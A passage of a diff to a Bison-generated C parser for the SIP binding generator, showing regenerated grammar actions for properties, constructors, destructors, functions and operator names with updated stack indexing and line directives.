+ } ++#line 6540 "../parser.c" + break; + +- case 428: +-#line 3470 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(2) - (3)].property); ++ case 429: /* property_args: '(' property_arg_list ')' */ ++#line 3496 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-1].property); + } ++#line 6548 "../parser.c" + break; + +- case 430: +-#line 3476 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(1) - (3)].property); ++ case 431: /* property_arg_list: property_arg_list ',' property_arg */ ++#line 3502 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-2].property); + +- switch ((yyvsp[(3) - (3)].property).token) ++ switch ((yyvsp[0].property).token) + { +- case TK_GET: (yyval.property).get = (yyvsp[(3) - (3)].property).get; break; +- case TK_NAME: 
(yyval.property).name = (yyvsp[(3) - (3)].property).name; break; +- case TK_SET: (yyval.property).set = (yyvsp[(3) - (3)].property).set; break; ++ case TK_GET: (yyval.property).get = (yyvsp[0].property).get; break; ++ case TK_NAME: (yyval.property).name = (yyvsp[0].property).name; break; ++ case TK_SET: (yyval.property).set = (yyvsp[0].property).set; break; + } + } ++#line 6563 "../parser.c" + break; + +- case 431: +-#line 3488 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 432: /* property_arg: TK_GET '=' TK_NAME_VALUE */ ++#line 3514 "parser.y" ++ { + (yyval.property).token = TK_GET; + +- (yyval.property).get = (yyvsp[(3) - (3)].text); ++ (yyval.property).get = (yyvsp[0].text); + (yyval.property).name = NULL; + (yyval.property).set = NULL; + } ++#line 6575 "../parser.c" + break; + +- case 432: +-#line 3495 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 433: /* property_arg: TK_NAME '=' name_or_string */ ++#line 3521 "parser.y" ++ { + (yyval.property).token = TK_NAME; + + (yyval.property).get = NULL; +- (yyval.property).name = (yyvsp[(3) - (3)].text); ++ (yyval.property).name = (yyvsp[0].text); + (yyval.property).set = NULL; + } ++#line 6587 "../parser.c" + break; + +- case 433: +-#line 3502 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 434: /* property_arg: TK_SET '=' TK_NAME_VALUE */ ++#line 3528 "parser.y" ++ { + (yyval.property).token = TK_SET; + + (yyval.property).get = NULL; + (yyval.property).name = NULL; +- (yyval.property).set = (yyvsp[(3) - (3)].text); ++ (yyval.property).set = (yyvsp[0].text); + } ++#line 6599 "../parser.c" + break; + +- case 434: +-#line 3511 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 435: /* property_body: %empty */ ++#line 3537 "parser.y" ++ { + (yyval.property).token = 0; + (yyval.property).docstring = NULL; + } ++#line 6608 "../parser.c" + break; + +- case 435: +-#line 3515 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(2) - (4)].property); ++ case 436: /* property_body: '{' 
property_body_directives '}' ';' */ ++#line 3541 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-2].property); + } ++#line 6616 "../parser.c" + break; + +- case 437: +-#line 3521 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(1) - (2)].property); ++ case 438: /* property_body_directives: property_body_directives property_body_directive */ ++#line 3547 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-1].property); + +- switch ((yyvsp[(2) - (2)].property).token) ++ switch ((yyvsp[0].property).token) + { +- case TK_DOCSTRING: (yyval.property).docstring = (yyvsp[(2) - (2)].property).docstring; break; ++ case TK_DOCSTRING: (yyval.property).docstring = (yyvsp[0].property).docstring; break; + } + } ++#line 6629 "../parser.c" + break; + +- case 438: +-#line 3531 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 439: /* property_body_directive: ifstart */ ++#line 3557 "parser.y" ++ { + (yyval.property).token = TK_IF; + } ++#line 6637 "../parser.c" + break; + +- case 439: +-#line 3534 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 440: /* property_body_directive: ifend */ ++#line 3560 "parser.y" ++ { + (yyval.property).token = TK_END; + } ++#line 6645 "../parser.c" + break; + +- case 440: +-#line 3537 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 441: /* property_body_directive: docstring */ ++#line 3563 "parser.y" ++ { + if (notSkipping()) + { + (yyval.property).token = TK_DOCSTRING; +- (yyval.property).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.property).docstring = (yyvsp[0].docstr); + } + else + { +@@ -6728,30 +6658,34 @@ yyreduce: + (yyval.property).docstring = NULL; + } + } ++#line 6662 "../parser.c" + break; + +- case 443: +-#line 3555 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 444: /* optslot: %empty */ ++#line 3581 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 6670 "../parser.c" + break; + +- case 444: +-#line 3558 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 445: /* optslot: TK_SLOTS */ ++#line 3584 "parser.y" 
++ { + (yyval.number) = SECT_IS_SLOT; + } ++#line 6678 "../parser.c" + break; + +- case 445: +-#line 3564 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsVirt = TRUE;} ++ case 446: /* $@15: %empty */ ++#line 3590 "parser.y" ++ {currentIsVirt = TRUE;} ++#line 6684 "../parser.c" + break; + +- case 448: +-#line 3568 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 449: /* dtor_decl: '~' TK_NAME_VALUE '(' ')' optexceptions optabstract optflags ';' premethodcode methodcode virtualcatchercode */ ++#line 3594 "parser.y" ++ { + /* Note that we allow non-virtual dtors in C modules. */ + + if (notSkipping()) +@@ -6764,22 +6698,22 @@ yyreduce: + + classDef *cd = currentScope(); + +- checkAnnos(&(yyvsp[(7) - (11)].optflags), annos); ++ checkAnnos(&(yyvsp[-4].optflags), annos); + +- if (strcmp(classBaseName(cd),(yyvsp[(2) - (11)].text)) != 0) ++ if (strcmp(classBaseName(cd),(yyvsp[-9].text)) != 0) + yyerror("Destructor doesn't have the same name as its class"); + + if (isDtor(cd)) + yyerror("Destructor has already been defined"); + +- if (currentSpec -> genc && (yyvsp[(9) - (11)].codeb) == NULL) ++ if (currentSpec -> genc && (yyvsp[-2].codeb) == NULL) + yyerror("Destructor in C modules must include %MethodCode"); + + +- appendCodeBlock(&cd->dealloccode, (yyvsp[(9) - (11)].codeb)); /* premethodcode */ +- appendCodeBlock(&cd->dealloccode, (yyvsp[(10) - (11)].codeb)); /* methodcode */ +- appendCodeBlock(&cd->dtorcode, (yyvsp[(11) - (11)].codeb)); +- cd -> dtorexceptions = (yyvsp[(5) - (11)].throwlist); ++ appendCodeBlock(&cd->dealloccode, (yyvsp[-2].codeb)); /* premethodcode */ ++ appendCodeBlock(&cd->dealloccode, (yyvsp[-1].codeb)); /* methodcode */ ++ appendCodeBlock(&cd->dtorcode, (yyvsp[0].codeb)); ++ cd -> dtorexceptions = (yyvsp[-6].throwlist); + + /* + * Note that we don't apply the protected/public hack to dtors +@@ -6787,7 +6721,7 @@ yyreduce: + */ + cd->classflags |= sectionFlags; + +- if ((yyvsp[(6) - (11)].number)) ++ if ((yyvsp[-5].number)) + { + if 
(!currentIsVirt) + yyerror("Abstract destructor must be virtual"); +@@ -6799,7 +6733,7 @@ yyreduce: + * The class has a shadow if we have a virtual dtor or some + * dtor code. + */ +- if (currentIsVirt || (yyvsp[(10) - (11)].codeb) != NULL) ++ if (currentIsVirt || (yyvsp[-1].codeb) != NULL) + { + if (currentSpec -> genc) + yyerror("Virtual destructor or %VirtualCatcherCode not allowed in a C module"); +@@ -6807,24 +6741,26 @@ yyreduce: + setNeedsShadow(cd); + } + +- if (getReleaseGIL(&(yyvsp[(7) - (11)].optflags))) ++ if (getReleaseGIL(&(yyvsp[-4].optflags))) + setIsReleaseGILDtor(cd); +- else if (getHoldGIL(&(yyvsp[(7) - (11)].optflags))) ++ else if (getHoldGIL(&(yyvsp[-4].optflags))) + setIsHoldGILDtor(cd); + } + + currentIsVirt = FALSE; + } ++#line 6753 "../parser.c" + break; + +- case 449: +-#line 3634 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentCtorIsExplicit = TRUE;} ++ case 450: /* $@16: %empty */ ++#line 3660 "parser.y" ++ {currentCtorIsExplicit = TRUE;} ++#line 6759 "../parser.c" + break; + +- case 452: +-#line 3638 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 453: /* simplector: TK_NAME_VALUE '(' arglist ')' optexceptions optflags optctorsig ';' optdocstring premethodcode methodcode */ ++#line 3664 "parser.y" ++ { + /* Note that we allow ctors in C modules. 
*/ + + if (notSkipping()) +@@ -6846,11 +6782,11 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(6) - (11)].optflags), annos); ++ checkAnnos(&(yyvsp[-5].optflags), annos); + + if (currentSpec -> genc) + { +- if ((yyvsp[(10) - (11)].codeb) == NULL && (yyvsp[(3) - (11)].signature).nrArgs != 0) ++ if ((yyvsp[-1].codeb) == NULL && (yyvsp[-8].signature).nrArgs != 0) + yyerror("Constructors with arguments in C modules must include %MethodCode"); + + if (currentCtorIsExplicit) +@@ -6860,80 +6796,87 @@ yyreduce: + if ((sectionFlags & (SECT_IS_PUBLIC | SECT_IS_PROT | SECT_IS_PRIVATE)) == 0) + yyerror("Constructor must be in the public, private or protected sections"); + +- newCtor(currentModule, (yyvsp[(1) - (11)].text), sectionFlags, &(yyvsp[(3) - (11)].signature), &(yyvsp[(6) - (11)].optflags), (yyvsp[(11) - (11)].codeb), (yyvsp[(5) - (11)].throwlist), (yyvsp[(7) - (11)].optsignature), +- currentCtorIsExplicit, (yyvsp[(9) - (11)].docstr), (yyvsp[(10) - (11)].codeb)); ++ newCtor(currentModule, (yyvsp[-10].text), sectionFlags, &(yyvsp[-8].signature), &(yyvsp[-5].optflags), (yyvsp[0].codeb), (yyvsp[-6].throwlist), (yyvsp[-4].optsignature), ++ currentCtorIsExplicit, (yyvsp[-2].docstr), (yyvsp[-1].codeb)); + } + +- free((yyvsp[(1) - (11)].text)); ++ free((yyvsp[-10].text)); + + currentCtorIsExplicit = FALSE; + } ++#line 6808 "../parser.c" + break; + +- case 453: +-#line 3684 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 454: /* optctorsig: %empty */ ++#line 3710 "parser.y" ++ { + (yyval.optsignature) = NULL; + } ++#line 6816 "../parser.c" + break; + +- case 454: +-#line 3687 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 455: /* $@17: %empty */ ++#line 3713 "parser.y" ++ { + parsingCSignature = TRUE; + } ++#line 6824 "../parser.c" + break; + +- case 455: +-#line 3689 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 456: /* optctorsig: '[' $@17 '(' arglist ')' ']' */ ++#line 3715 "parser.y" ++ { + (yyval.optsignature) = sipMalloc(sizeof (signatureDef)); + +- 
*(yyval.optsignature) = (yyvsp[(4) - (6)].signature); ++ *(yyval.optsignature) = (yyvsp[-2].signature); + + parsingCSignature = FALSE; + } ++#line 6836 "../parser.c" + break; + +- case 456: +-#line 3698 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 457: /* optsig: %empty */ ++#line 3724 "parser.y" ++ { + (yyval.optsignature) = NULL; + } ++#line 6844 "../parser.c" + break; + +- case 457: +-#line 3701 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 458: /* $@18: %empty */ ++#line 3727 "parser.y" ++ { + parsingCSignature = TRUE; + } ++#line 6852 "../parser.c" + break; + +- case 458: +-#line 3703 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 459: /* optsig: '[' $@18 cpptype '(' arglist ')' ']' */ ++#line 3729 "parser.y" ++ { + (yyval.optsignature) = sipMalloc(sizeof (signatureDef)); + +- *(yyval.optsignature) = (yyvsp[(5) - (7)].signature); +- (yyval.optsignature)->result = (yyvsp[(3) - (7)].memArg); ++ *(yyval.optsignature) = (yyvsp[-2].signature); ++ (yyval.optsignature)->result = (yyvsp[-4].memArg); + + parsingCSignature = FALSE; + } ++#line 6865 "../parser.c" + break; + +- case 459: +-#line 3713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 460: /* function: cpptype TK_NAME_VALUE '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' optdocstring premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3739 "parser.y" ++ { + if (notSkipping()) + { +- applyTypeFlags(currentModule, &(yyvsp[(1) - (17)].memArg), &(yyvsp[(10) - (17)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-16].memArg), &(yyvsp[-7].optflags)); + +- (yyvsp[(4) - (17)].signature).result = (yyvsp[(1) - (17)].memArg); ++ (yyvsp[-13].signature).result = (yyvsp[-16].memArg); + + newFunction(currentSpec, currentModule, currentScope(), NULL, + NULL, sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, (yyvsp[(2) - (17)].text), &(yyvsp[(4) - (17)].signature), (yyvsp[(6) - (17)].number), (yyvsp[(9) - (17)].number), 
&(yyvsp[(10) - (17)].optflags), +- (yyvsp[(15) - (17)].codeb), (yyvsp[(16) - (17)].codeb), (yyvsp[(17) - (17)].codeb), (yyvsp[(8) - (17)].throwlist), (yyvsp[(11) - (17)].optsignature), (yyvsp[(13) - (17)].docstr), (yyvsp[(7) - (17)].number), (yyvsp[(14) - (17)].codeb)); ++ currentIsSlot, currentIsVirt, (yyvsp[-15].text), &(yyvsp[-13].signature), (yyvsp[-11].number), (yyvsp[-8].number), &(yyvsp[-7].optflags), ++ (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-9].throwlist), (yyvsp[-6].optsignature), (yyvsp[-4].docstr), (yyvsp[-10].number), (yyvsp[-3].codeb)); + } + + currentIsStatic = FALSE; +@@ -6941,11 +6884,12 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6888 "../parser.c" + break; + +- case 460: +-#line 3731 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 461: /* function: cpptype TK_OPERATOR '=' '(' cpptype ')' ';' */ ++#line 3757 "parser.y" ++ { + /* + * It looks like an assignment operator (though we don't bother to + * check the types) so make sure it is private. +@@ -6965,11 +6909,12 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6913 "../parser.c" + break; + +- case 461: +-#line 3751 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 462: /* function: cpptype TK_OPERATOR operatorname '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3777 "parser.y" ++ { + if (notSkipping()) + { + classDef *cd = currentScope(); +@@ -6989,23 +6934,23 @@ yyreduce: + ns_scope = NULL; + } + +- applyTypeFlags(currentModule, &(yyvsp[(1) - (17)].memArg), &(yyvsp[(11) - (17)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-16].memArg), &(yyvsp[-6].optflags)); + + /* Handle the unary '+' and '-' operators. 
*/ +- if ((cd != NULL && (yyvsp[(5) - (17)].signature).nrArgs == 0) || (cd == NULL && (yyvsp[(5) - (17)].signature).nrArgs == 1)) ++ if ((cd != NULL && (yyvsp[-12].signature).nrArgs == 0) || (cd == NULL && (yyvsp[-12].signature).nrArgs == 1)) + { +- if (strcmp((yyvsp[(3) - (17)].text), "__add__") == 0) +- (yyvsp[(3) - (17)].text) = "__pos__"; +- else if (strcmp((yyvsp[(3) - (17)].text), "__sub__") == 0) +- (yyvsp[(3) - (17)].text) = "__neg__"; ++ if (strcmp((yyvsp[-14].text), "__add__") == 0) ++ (yyvsp[-14].text) = "__pos__"; ++ else if (strcmp((yyvsp[-14].text), "__sub__") == 0) ++ (yyvsp[-14].text) = "__neg__"; + } + +- (yyvsp[(5) - (17)].signature).result = (yyvsp[(1) - (17)].memArg); ++ (yyvsp[-12].signature).result = (yyvsp[-16].memArg); + + newFunction(currentSpec, currentModule, cd, ns_scope, NULL, + sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, (yyvsp[(3) - (17)].text), &(yyvsp[(5) - (17)].signature), (yyvsp[(7) - (17)].number), (yyvsp[(10) - (17)].number), &(yyvsp[(11) - (17)].optflags), +- (yyvsp[(15) - (17)].codeb), (yyvsp[(16) - (17)].codeb), (yyvsp[(17) - (17)].codeb), (yyvsp[(9) - (17)].throwlist), (yyvsp[(12) - (17)].optsignature), NULL, (yyvsp[(8) - (17)].number), (yyvsp[(14) - (17)].codeb)); ++ currentIsSlot, currentIsVirt, (yyvsp[-14].text), &(yyvsp[-12].signature), (yyvsp[-10].number), (yyvsp[-7].number), &(yyvsp[-6].optflags), ++ (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-8].throwlist), (yyvsp[-5].optsignature), NULL, (yyvsp[-9].number), (yyvsp[-3].codeb)); + } + + currentIsStatic = FALSE; +@@ -7013,22 +6958,23 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6962 "../parser.c" + break; + +- case 462: +-#line 3795 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 463: /* function: TK_OPERATOR cpptype '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3821 "parser.y" 
++ { + if (notSkipping()) + { + char *sname; + classDef *scope = currentScope(); + +- if (scope == NULL || (yyvsp[(4) - (16)].signature).nrArgs != 0) ++ if (scope == NULL || (yyvsp[-12].signature).nrArgs != 0) + yyerror("Operator casts must be specified in a class and have no arguments"); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (16)].memArg), &(yyvsp[(10) - (16)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-14].memArg), &(yyvsp[-6].optflags)); + +- switch ((yyvsp[(2) - (16)].memArg).atype) ++ switch ((yyvsp[-14].memArg).atype) + { + case defined_type: + sname = NULL; +@@ -7067,12 +7013,12 @@ yyreduce: + + if (sname != NULL) + { +- (yyvsp[(4) - (16)].signature).result = (yyvsp[(2) - (16)].memArg); ++ (yyvsp[-12].signature).result = (yyvsp[-14].memArg); + + newFunction(currentSpec, currentModule, scope, NULL, NULL, + sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, sname, &(yyvsp[(4) - (16)].signature), (yyvsp[(6) - (16)].number), (yyvsp[(9) - (16)].number), +- &(yyvsp[(10) - (16)].optflags), (yyvsp[(14) - (16)].codeb), (yyvsp[(15) - (16)].codeb), (yyvsp[(16) - (16)].codeb), (yyvsp[(8) - (16)].throwlist), (yyvsp[(11) - (16)].optsignature), NULL, (yyvsp[(7) - (16)].number), (yyvsp[(13) - (16)].codeb)); ++ currentIsSlot, currentIsVirt, sname, &(yyvsp[-12].signature), (yyvsp[-10].number), (yyvsp[-7].number), ++ &(yyvsp[-6].optflags), (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-8].throwlist), (yyvsp[-5].optsignature), NULL, (yyvsp[-9].number), (yyvsp[-3].codeb)); + } + else + { +@@ -7080,11 +7026,11 @@ yyreduce: + + /* Check it doesn't already exist. 
*/ + for (al = scope->casts; al != NULL; al = al->next) +- if (compareScopedNames((yyvsp[(2) - (16)].memArg).u.snd, al->arg.u.snd) == 0) ++ if (compareScopedNames((yyvsp[-14].memArg).u.snd, al->arg.u.snd) == 0) + yyerror("This operator cast has already been specified in this class"); + + al = sipMalloc(sizeof (argList)); +- al->arg = (yyvsp[(2) - (16)].memArg); ++ al->arg = (yyvsp[-14].memArg); + al->next = scope->casts; + + scope->casts = al; +@@ -7096,367 +7042,421 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 7046 "../parser.c" + break; + +- case 463: +-#line 3876 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__add__";} ++ case 464: /* operatorname: '+' */ ++#line 3902 "parser.y" ++ {(yyval.text) = "__add__";} ++#line 7052 "../parser.c" + break; + +- case 464: +-#line 3877 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__sub__";} ++ case 465: /* operatorname: '-' */ ++#line 3903 "parser.y" ++ {(yyval.text) = "__sub__";} ++#line 7058 "../parser.c" + break; + +- case 465: +-#line 3878 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__mul__";} ++ case 466: /* operatorname: '*' */ ++#line 3904 "parser.y" ++ {(yyval.text) = "__mul__";} ++#line 7064 "../parser.c" + break; + +- case 466: +-#line 3879 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__div__";} ++ case 467: /* operatorname: '/' */ ++#line 3905 "parser.y" ++ {(yyval.text) = "__div__";} ++#line 7070 "../parser.c" + break; + +- case 467: +-#line 3880 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__mod__";} ++ case 468: /* operatorname: '%' */ ++#line 3906 "parser.y" ++ {(yyval.text) = "__mod__";} ++#line 7076 "../parser.c" + break; + +- case 468: +-#line 3881 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__and__";} ++ case 469: /* operatorname: '&' */ ++#line 3907 "parser.y" ++ {(yyval.text) = "__and__";} ++#line 7082 "../parser.c" + break; + +- case 469: +-#line 3882 "sip-4.19.23/sipgen/metasrc/parser.y" +- 
{(yyval.text) = "__or__";} ++ case 470: /* operatorname: '|' */ ++#line 3908 "parser.y" ++ {(yyval.text) = "__or__";} ++#line 7088 "../parser.c" + break; + +- case 470: +-#line 3883 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__xor__";} ++ case 471: /* operatorname: '^' */ ++#line 3909 "parser.y" ++ {(yyval.text) = "__xor__";} ++#line 7094 "../parser.c" + break; + +- case 471: +-#line 3884 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__lshift__";} ++ case 472: /* operatorname: '<' '<' */ ++#line 3910 "parser.y" ++ {(yyval.text) = "__lshift__";} ++#line 7100 "../parser.c" + break; + +- case 472: +-#line 3885 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__rshift__";} ++ case 473: /* operatorname: '>' '>' */ ++#line 3911 "parser.y" ++ {(yyval.text) = "__rshift__";} ++#line 7106 "../parser.c" + break; + +- case 473: +-#line 3886 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__iadd__";} ++ case 474: /* operatorname: '+' '=' */ ++#line 3912 "parser.y" ++ {(yyval.text) = "__iadd__";} ++#line 7112 "../parser.c" + break; + +- case 474: +-#line 3887 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__isub__";} ++ case 475: /* operatorname: '-' '=' */ ++#line 3913 "parser.y" ++ {(yyval.text) = "__isub__";} ++#line 7118 "../parser.c" + break; + +- case 475: +-#line 3888 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__imul__";} ++ case 476: /* operatorname: '*' '=' */ ++#line 3914 "parser.y" ++ {(yyval.text) = "__imul__";} ++#line 7124 "../parser.c" + break; + +- case 476: +-#line 3889 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__idiv__";} ++ case 477: /* operatorname: '/' '=' */ ++#line 3915 "parser.y" ++ {(yyval.text) = "__idiv__";} ++#line 7130 "../parser.c" + break; + +- case 477: +-#line 3890 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__imod__";} ++ case 478: /* operatorname: '%' '=' */ ++#line 3916 "parser.y" ++ {(yyval.text) = "__imod__";} ++#line 7136 "../parser.c" + 
break; + +- case 478: +-#line 3891 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__iand__";} ++ case 479: /* operatorname: '&' '=' */ ++#line 3917 "parser.y" ++ {(yyval.text) = "__iand__";} ++#line 7142 "../parser.c" + break; + +- case 479: +-#line 3892 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ior__";} ++ case 480: /* operatorname: '|' '=' */ ++#line 3918 "parser.y" ++ {(yyval.text) = "__ior__";} ++#line 7148 "../parser.c" + break; + +- case 480: +-#line 3893 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ixor__";} ++ case 481: /* operatorname: '^' '=' */ ++#line 3919 "parser.y" ++ {(yyval.text) = "__ixor__";} ++#line 7154 "../parser.c" + break; + +- case 481: +-#line 3894 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ilshift__";} ++ case 482: /* operatorname: '<' '<' '=' */ ++#line 3920 "parser.y" ++ {(yyval.text) = "__ilshift__";} ++#line 7160 "../parser.c" + break; + +- case 482: +-#line 3895 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__irshift__";} ++ case 483: /* operatorname: '>' '>' '=' */ ++#line 3921 "parser.y" ++ {(yyval.text) = "__irshift__";} ++#line 7166 "../parser.c" + break; + +- case 483: +-#line 3896 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__invert__";} ++ case 484: /* operatorname: '~' */ ++#line 3922 "parser.y" ++ {(yyval.text) = "__invert__";} ++#line 7172 "../parser.c" + break; + +- case 484: +-#line 3897 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__call__";} ++ case 485: /* operatorname: '(' ')' */ ++#line 3923 "parser.y" ++ {(yyval.text) = "__call__";} ++#line 7178 "../parser.c" + break; + +- case 485: +-#line 3898 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__getitem__";} ++ case 486: /* operatorname: '[' ']' */ ++#line 3924 "parser.y" ++ {(yyval.text) = "__getitem__";} ++#line 7184 "../parser.c" + break; + +- case 486: +-#line 3899 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__lt__";} ++ case 487: /* 
operatorname: '<' */ ++#line 3925 "parser.y" ++ {(yyval.text) = "__lt__";} ++#line 7190 "../parser.c" + break; + +- case 487: +-#line 3900 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__le__";} ++ case 488: /* operatorname: '<' '=' */ ++#line 3926 "parser.y" ++ {(yyval.text) = "__le__";} ++#line 7196 "../parser.c" + break; + +- case 488: +-#line 3901 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__eq__";} ++ case 489: /* operatorname: '=' '=' */ ++#line 3927 "parser.y" ++ {(yyval.text) = "__eq__";} ++#line 7202 "../parser.c" + break; + +- case 489: +-#line 3902 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ne__";} ++ case 490: /* operatorname: '!' '=' */ ++#line 3928 "parser.y" ++ {(yyval.text) = "__ne__";} ++#line 7208 "../parser.c" + break; + +- case 490: +-#line 3903 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__gt__";} ++ case 491: /* operatorname: '>' */ ++#line 3929 "parser.y" ++ {(yyval.text) = "__gt__";} ++#line 7214 "../parser.c" + break; + +- case 491: +-#line 3904 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ge__";} ++ case 492: /* operatorname: '>' '=' */ ++#line 3930 "parser.y" ++ {(yyval.text) = "__ge__";} ++#line 7220 "../parser.c" + break; + +- case 492: +-#line 3907 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 493: /* optconst: %empty */ ++#line 3933 "parser.y" ++ { + (yyval.number) = FALSE; + } ++#line 7228 "../parser.c" + break; + +- case 493: +-#line 3910 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 494: /* optconst: TK_CONST */ ++#line 3936 "parser.y" ++ { + (yyval.number) = TRUE; + } ++#line 7236 "../parser.c" + break; + +- case 494: +-#line 3915 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 495: /* optfinal: %empty */ ++#line 3941 "parser.y" ++ { + (yyval.number) = FALSE; + } ++#line 7244 "../parser.c" + break; + +- case 495: +-#line 3918 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 496: /* optfinal: TK_FINAL */ ++#line 3944 "parser.y" ++ { + 
(yyval.number) = TRUE; + } ++#line 7252 "../parser.c" + break; + +- case 496: +-#line 3923 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 497: /* optabstract: %empty */ ++#line 3949 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 7260 "../parser.c" + break; + +- case 497: +-#line 3926 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (2)].number) != 0) ++ case 498: /* optabstract: '=' TK_NUMBER_VALUE */ ++#line 3952 "parser.y" ++ { ++ if ((yyvsp[0].number) != 0) + yyerror("Abstract virtual function '= 0' expected"); + + (yyval.number) = TRUE; + } ++#line 7271 "../parser.c" + break; + +- case 498: +-#line 3934 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 499: /* optflags: %empty */ ++#line 3960 "parser.y" ++ { + (yyval.optflags).nrFlags = 0; + } ++#line 7279 "../parser.c" + break; + +- case 499: +-#line 3937 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.optflags) = (yyvsp[(2) - (3)].optflags); ++ case 500: /* optflags: '/' flaglist '/' */ ++#line 3963 "parser.y" ++ { ++ (yyval.optflags) = (yyvsp[-1].optflags); + } ++#line 7287 "../parser.c" + break; + +- case 500: +-#line 3943 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.optflags).flags[0] = (yyvsp[(1) - (1)].flag); ++ case 501: /* flaglist: flag */ ++#line 3969 "parser.y" ++ { ++ (yyval.optflags).flags[0] = 